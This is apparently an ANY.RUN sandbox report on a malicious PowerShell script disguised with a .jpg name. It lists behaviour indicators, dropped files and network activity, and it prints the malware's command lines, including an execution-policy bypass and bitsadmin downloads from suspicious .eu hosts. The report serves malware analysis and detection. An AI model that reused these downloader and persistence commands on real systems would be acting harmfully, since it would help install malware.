File name:

eval_yzDGqWab.jpg.cynet

Full analysis: https://app.any.run/tasks/84b07074-b8e4-4d46-b7c7-37e369e5d90b
Verdict: Malicious activity
Analysis date: June 23, 2025, 11:35:22
OS: Windows 10 Professional (build: 19044, 64 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF, LF line terminators
MD5:

653FB92824F80EBBD8D83727E2A34312

SHA1:

F4834A5677DFD6F9BFE316141D821DD56FF04343

SHA256:

6CFC9F82ED0F141118D393C192EBCAB204F52BB291D2C8F3CA39202DB3E20C7D

SSDEEP:

3072:15IWXXFSOxAJ0t+5IRm6FbMTiUJ0bzoLaBse+hDwQ45MRMOAnU5ViEpNlJNrN:1BXInitllF4TPJzODsT1onU5ViEpNlJL

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1828)
      • powershell.exe (PID: 6948)

    • Uses Task Scheduler to run other applications

      • powershell.exe (PID: 1828)

    • Changes powershell execution policy (Bypass)

      • wscript.exe (PID: 3652)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 6948)

    • Downloads files via BITSADMIN.EXE

      • cmd.exe (PID: 724)
      • cmd.exe (PID: 3724)

  • SUSPICIOUS

    • Modifies existing scheduled task

      • schtasks.exe (PID: 6936)

    • Lists all scheduled tasks in specific format

      • schtasks.exe (PID: 4116)

    • The process executes via Task Scheduler

      • wscript.exe (PID: 3652)

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 3652)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 3652)

    • The process executes Powershell scripts

      • wscript.exe (PID: 3652)

    • Starts a new process with hidden mode (POWERSHELL)

      • powershell.exe (PID: 6948)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 6948)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6948)

    • Gets content of a file (POWERSHELL)

      • powershell.exe (PID: 6948)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 6948)

  • INFO

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1828)
      • powershell.exe (PID: 6948)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 1828)

    • Gets or sets the time when the file was last written to (POWERSHELL)

      • powershell.exe (PID: 1828)

    • Launching a file from Task Scheduler

      • powershell.exe (PID: 1828)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 6948)

    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 6948)

    • Uses BITSADMIN.EXE

      • cmd.exe (PID: 5348)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
156
Monitored processes
20
Malicious processes
2
Suspicious processes
3

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs schtasks.exe no specs schtasks.exe no specs conhost.exe no specs schtasks.exe no specs conhost.exe no specs wscript.exe no specs powershell.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs bitsadmin.exe no specs bitsadmin.exe no specs bitsadmin.exe no specs slui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
320\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
724"C:\WINDOWS\system32\cmd.exe" /C bitsadmin /transfer zNOdDXiT /download /priority FOREGROUND "https://uyiuwbn.eu/topic//main.php?ch=1&i=c4f31a43a35aef9b71ec37ddb12eed73" C:\users\admin\AppData\Roaming\spoolsv\0_spoolsv.log C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
1128C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
1828"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\AppData\Local\Temp\eval_yzDGqWab.jpg.cynet.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
4294967295
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
2072\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeschtasks.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2072\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2580bitsadmin /transfer zNOdDXiT /download /priority FOREGROUND "https://uyiuwbn.eu/topic//main.php?ch=1&i=c4f31a43a35aef9b71ec37ddb12eed73" C:\users\admin\AppData\Roaming\spoolsv\0_spoolsv.log C:\Windows\System32\bitsadmin.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Version:
7.8.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\bitsadmin.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\sspicli.dll
3580bitsadmin /transfer hBMylZGu /download /priority FOREGROUND "https://uognbcg.eu/topic//main.php?ch=1&i=c4f31a43a35aef9b71ec37ddb12eed73" C:\users\admin\AppData\Roaming\spoolsv\1_spoolsv.log C:\Windows\System32\bitsadmin.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Version:
7.8.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\bitsadmin.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\sspicli.dll
3652"C:\WINDOWS\system32\wscript.EXE" /E:vbscript c:\users\admin\AppData\Roaming\\spoolsv\ArGwaQsV.tmpC:\Windows\System32\wscript.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3724"C:\WINDOWS\system32\cmd.exe" /C bitsadmin /transfer hBMylZGu /download /priority FOREGROUND "https://uognbcg.eu/topic//main.php?ch=1&i=c4f31a43a35aef9b71ec37ddb12eed73" C:\users\admin\AppData\Roaming\spoolsv\1_spoolsv.log C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
Total events
12 497
Read events
12 497
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
10
Unknown types
0

Dropped files

PID
Process
Filename
Type
1828powershell.exeC:\Users\admin\AppData\Roaming\spoolsv\ArGwaQsV.tmptext
MD5:F8E3C12689023D0EBF9FBDEB92644A8D
SHA256:53E124E18AC7386799FF27D58889F27E99DA0955ED4F11C39591422298AB69F0
1828powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:6CB92D87B1B5FDFC7B6F354994066FBE
SHA256:3B6E6B67E9A1F0CF41A7E8B777B36FEDA4BFE4DBAF4963AD5DD3AA5E554B1CE4
1828powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_set3kutw.uyv.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1828powershell.exeC:\Users\admin\AppData\Roaming\spoolsv\main.initext
MD5:EB923F8D975EC2D1178BE08642432D39
SHA256:97E3D8F838205FA786BA4368D8C83DDC4587CD9A86F3511C1B6AB92E3594AAC1
1828powershell.exeC:\Users\admin\AppData\Roaming\spoolsv\domain.initext
MD5:5036E53469A837094EBE6AB8A25F39C6
SHA256:4D1B302051FC22C584C464C89CE87E292977738EE967E2BEFC3A6BF21827F270
1828powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_mfedtqsj.hod.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6948powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_h2vfwnjr.21g.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6948powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:C904B83F3EB6B36C24B175843EAE2F18
SHA256:AE9C3B418FC314078AEA3B8FE77670BDBD72E127D1DAE886D031A73C2074B64F
6948powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_z55mjraw.gqp.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1828powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2DQONSONTBIFO0ZQWGUF.tempbinary
MD5:6CB92D87B1B5FDFC7B6F354994066FBE
SHA256:3B6E6B67E9A1F0CF41A7E8B777B36FEDA4BFE4DBAF4963AD5DD3AA5E554B1CE4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
22
DNS requests
17
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1268
svchost.exe
GET
200
2.18.121.147:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1148
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
1268
svchost.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1148
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
3100
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
5944
MoUsoCoreWorker.exe
40.127.240.158:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
1812
RUXIMICS.exe
40.127.240.158:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
1268
svchost.exe
40.127.240.158:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4
System
192.168.100.255:138
whitelisted
1268
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1268
svchost.exe
2.18.121.147:80
crl.microsoft.com
AKAMAI-AS
FR
whitelisted
1268
svchost.exe
2.23.246.101:80
www.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted
5944
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1148
SIHClient.exe
4.245.163.56:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 216.58.212.174
whitelisted
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.104.136.2
whitelisted
crl.microsoft.com
  • 2.18.121.147
  • 2.18.121.139
whitelisted
www.microsoft.com
  • 2.23.246.101
  • 95.101.149.131
whitelisted
slscr.update.microsoft.com
  • 4.245.163.56
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted
wGr.com
  • 172.104.149.86
  • 172.104.251.198
  • 139.162.174.209
  • 139.162.181.76
unknown
login.live.com
  • 20.190.159.75
  • 20.190.159.128
  • 40.126.31.67
  • 40.126.31.73
  • 20.190.159.0
  • 20.190.159.130
  • 20.190.159.23
  • 40.126.31.69
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
uognbcg.eu
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
eval_yzDGqWab.jpg.cynet